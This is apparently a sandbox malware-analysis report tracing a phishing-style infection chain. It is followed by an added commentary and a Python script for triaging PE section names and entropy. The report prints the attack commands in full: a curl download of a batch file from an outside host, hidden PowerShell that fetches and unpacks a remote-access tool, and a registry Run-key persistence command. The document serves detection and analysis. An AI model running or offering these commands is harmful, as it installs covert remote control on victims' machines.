Source: curl.exe, 00000018.00000002.1578327815.0000000002985000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.1577847612.0000000002985000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000003.1577752347.0000000002985000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.phpUZ
Source: curl.exe, 00000018.00000002.1578218088.0000000002958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.phpf
Source: curl.exe, 00000018.00000002.1578218088.0000000002958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/header.phpj
Source: client32.exe, 0000001D.00000002.2019433099.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000001D.00000002.2019290970.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000001D.00000002.2017612312.0000000000905000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001E.00000002.1764196566.0000000003240000.00000004.00000020.00020000.00000000.sdmp, xss.bat.24.dr String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781
Source: powershell.exe, 0000001C.00000002.1757624677.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c7811/
Source: reg.exe, 0000001E.00000002.1764196566.0000000003240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781LOCALAPPDATA=C:
Source: client32.exe, 0000001D.00000002.2017612312.00000000008BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781Y
Source: client32.exe, 0000001D.00000002.2019290970.0000000000E80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781s=
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: Yara match File source: 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: client32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 3244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\PCICL32.DLL, type: DROPPED

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\client32.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\TCCTL32.DLL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\branding.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\pcicapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\PCICHEK.DLL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\PCICL32.DLL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\kpodja\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\HTCTL32.DLL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\gehrga\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\msvcr100.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\nkakus\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\remcmdstub.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\tailji\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\mirvfa\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\katrga\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Directory\hw.dll
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Process token adjusted: Security
Source: libstdc++-6.dll2.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll0.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll3.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll1.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll0.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll1.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll4.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll3.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll.28.dr Static PE information: Number of sections : 11 > 10
Source: avcodec-53.dll2.28.dr Static PE information: Number of sections : 11 > 10
Source: libstdc++-6.dll4.28.dr Static PE information: Number of sections : 11 > 10
Source: branding.dll.28.dr Static PE information: No import functions for PE file found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe" /f
Source: itvwd64.sys2.28.dr Binary string: \Device\itvwd
Source: classification engine Classification label: mal100.phis.troj.win@48/239@25/13
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Directory
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtgkoksc.wue.ps1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" && start /min "" "C:\ProgramData\xss.bat" Press Enter
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe File read: C:\Users\user\AppData\Roaming\Directory\client32.ini
Source: C:\Windows\SysWOW64\curl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3220,i,14266024722842573986,13548840143605449493,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3268 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.focuslight.com/"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\ProgramData\xss.bat" Press Enter
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' -OutFile 'C:\Users\user\AppData\Roaming\Program.zip'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip', 'C:\Users\user\AppData\Roaming\Directory')"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe" /f
Source: unknown Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: apphelp.dll, pcicl32.dll, shfolder.dll, pcichek.dll, pcicapi.dll, mpr.dll, version.dll, winmm.dll, wsock32.dll, netapi32.dll, wininet.dll, msvcr100.dll, msvcr100.dll, netutils.dll, samcli.dll, dbghelp.dll, wtsapi32.dll, dbgcore.dll, uxtheme.dll, nsmtrace.dll, nslsp.dll, devobj.dll, msasn1.dll, pcihooks.dll, kernel.appcore.dll, wbemcomn.dll, textshaping.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll, riched32.dll, riched20.dll, usp10.dll, msls31.dll, mswsock.dll, windows.storage.dll, wldp.dll, pciinv.dll, firewallapi.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, fwpolicyiomgr.dll, dhcpcsvc6.dll, dhcpcsvc.dll, sspicli.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcicl32.dll, shfolder.dll, pcichek.dll, pcicapi.dll, mpr.dll, version.dll, winmm.dll, wsock32.dll, netapi32.dll, wininet.dll, msvcr100.dll, msvcr100.dll, netutils.dll, samcli.dll, wtsapi32.dll, uxtheme.dll, nsmtrace.dll, nslsp.dll, devobj.dll, msasn1.dll
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Section loaded: pcicl32.dll, shfolder.dll, pcichek.dll, pcicapi.dll, mpr.dll, version.dll, winmm.dll, wsock32.dll, netapi32.dll, wininet.dll, msvcr100.dll, msvcr100.dll, netutils.dll, samcli.dll, wtsapi32.dll, uxtheme.dll, nsmtrace.dll, nslsp.dll, devobj.dll, msasn1.dll
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 (CLSID_WbemLocator, the WMI locator object; this is the lookup behind the Win32_ComputerSystem query listed in the signatures)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\Directory\NSM.ini
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Directory\msvcr100.dll
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 0000001D.00000002.2023427992.0000000070142000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000021.00000002.1892321802.0000000070142000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000022.00000002.1974260328.0000000070142000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: msvcr100.i386.pdb source: client32.exe, 0000001D.00000002.2022808297.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, client32.exe, 00000021.00000002.1892063645.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, client32.exe, 00000022.00000002.1974000969.0000000070051000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, PCICL32.DLL.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr
Source: Binary string: g:\workspace\wsk\divert\install\WDDK\amd64\itvwd64.pdb source: powershell.exe, 0000001C.00000002.1759185059.0000000004FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.000000000522B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004E53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.0000000004F2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1759185059.000000000509B000.00000004.00000800.00020000.00000000.sdmp, itvwd64.sys4.28.dr, itvwd64.sys.28.dr, itvwd64.sys0.28.dr, itvwd64.sys2.28.dr
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 0000001D.00000000.1763409289.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000001D.00000002.2019779438.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000021.00000000.1888686094.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000021.00000002.1890861207.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000022.00000002.1973402402.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000022.00000000.1969236658.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, client32.exe.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, HTCTL32.DLL.28.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000001D.00000002.2023193636.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000021.00000002.1892228410.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000022.00000002.1974174646.0000000070125000.00000002.00000001.01000000.0000000E.sdmp, pcicapi.dll.28.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.28.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.28.dr

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' -OutFile 'C:\Users\user\AppData\Roaming\Program.zip'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip', 'C:\Users\user\AppData\Roaming\Directory')"
Source: avcodec-53.dll.28.dr (and the copies avcodec-53.dll0.28.dr through avcodec-53.dll4.28.dr) Static PE information: section names: .rodata, /4
Source: libstdc++-6.dll.28.dr (and the copies libstdc++-6.dll0.28.dr through libstdc++-6.dll4.28.dr) Static PE information: section name: .xdata
Source: avutil-51.dll.28.dr (and the copies avutil-51.dll0.28.dr through avutil-51.dll4.28.dr) Static PE information: section name: /4
Source: PCICL32.DLL.28.dr Static PE information: section name: .hhshare
Source: msvcr100.dll.28.dr Static PE information: section name: .text entropy: 6.909044922675825
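The two static findings above (section names outside the usual Microsoft set, and a .text section with entropy near 6.9) are cheap to reproduce on the dropped files yourself, and doing so shows why they need a caveat here: .rodata, .xdata and the "/4" string-table stub are what GCC/MinGW emits, and libstdc++-6.dll and the FFmpeg avcodec/avutil libraries are MinGW-built, so for those files the signature is a toolchain artifact rather than obfuscation; .hhshare in PCICL32.DLL and the dense .text in msvcr100.dll are the rows worth a second look. The following is an added example, not code from this report or from any of the dropped binaries: a dependency-free section-table walker plus Shannon entropy, run over two constructed minimal PE images (the "standard" section set, the 6.8 threshold and the sample images are assumptions made for the example).

```python
"""Static triage of dropped PE files: section names and .text entropy.
Added example, not part of the Joe Sandbox report or of NetSupport."""
import math
import random
import struct

# Section names a Microsoft-toolchain PE normally carries (assumed set); anything else is reported.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".didat"}
ENTROPY_THRESHOLD = 6.8   # assumed cut-off; the report flags a .text at 6.909


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(data: bytes):
    """Walk the section table; returns [(name, raw_offset, raw_size)] in table order."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ header")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)     # COFF NumberOfSections
    opt_size, = struct.unpack_from("<H", data, coff + 16)        # COFF SizeOfOptionalHeader
    table = coff + 20 + opt_size                                 # section table follows the optional header
    sections = []
    for i in range(num_sections):
        hdr = table + 40 * i                                     # IMAGE_SECTION_HEADER is 40 bytes
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, raw_ptr, raw_size))
    return sections


def triage(data: bytes, threshold: float = ENTROPY_THRESHOLD):
    """The two static findings the report lists, as (kind, detail) tuples in section order."""
    findings = []
    for name, ptr, size in pe_sections(data):
        if name not in STANDARD_SECTIONS:
            findings.append(("nonstandard_section", name))
        if name == ".text":
            ent = shannon_entropy(data[ptr:ptr + size])
            if ent >= threshold:
                findings.append(("high_entropy_text", round(ent, 3)))
    return findings


def build_pe(sections):
    """Constructed minimal PE for testing: DOS header, PE signature, COFF header with a
    zero-length optional header, section table, raw section data. Not a loadable image."""
    e_lfanew = 0x40
    table = e_lfanew + 4 + 20                     # 20-byte COFF header, no optional header
    data_start = table + 40 * len(sections)
    hdr = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr += b"PE\0\0"
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    hdr += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    body = bytearray()
    for name, raw in sections:
        hdr += name.encode("ascii").ljust(8, b"\0")
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, then 16 zero bytes (relocs, linenumbers, flags)
        hdr += struct.pack("<IIII", len(raw), 0x1000, len(raw), data_start + len(body))
        hdr += b"\0" * 16
        body += raw
    return bytes(hdr) + bytes(body)


def pseudo_random_bytes(n: int, seed: int = 7) -> bytes:
    """Deterministic high-entropy filler standing in for packed or encrypted code."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed samples modelled on the report's rows: GCC-style names plus a dense .text,
# and a plain MSVC-style layout that should produce no findings at all.
SUSPECT_PE = build_pe([(".text", pseudo_random_bytes(4096)), (".rdata", b"strings\0" * 64),
                       (".rodata", b"A" * 512), ("/4", b"\0" * 64), (".hhshare", b"\0" * 32)])
CLEAN_PE = build_pe([(".text", b"\x90" * 4096), (".rdata", b"x" * 64), (".rsrc", b"\0" * 16)])

if __name__ == "__main__":
    for label, image in (("suspect", SUSPECT_PE), ("clean", CLEAN_PE)):
        print(label, triage(image))
```

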